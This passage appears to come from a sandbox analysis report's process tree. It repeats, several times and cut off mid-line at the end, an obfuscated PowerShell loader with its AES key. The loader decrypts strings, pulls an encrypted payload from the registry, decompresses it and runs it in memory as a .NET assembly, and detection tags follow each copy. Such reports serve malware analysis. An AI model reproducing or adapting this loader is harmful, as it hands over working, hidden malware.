                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3176
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2100
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5404
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ 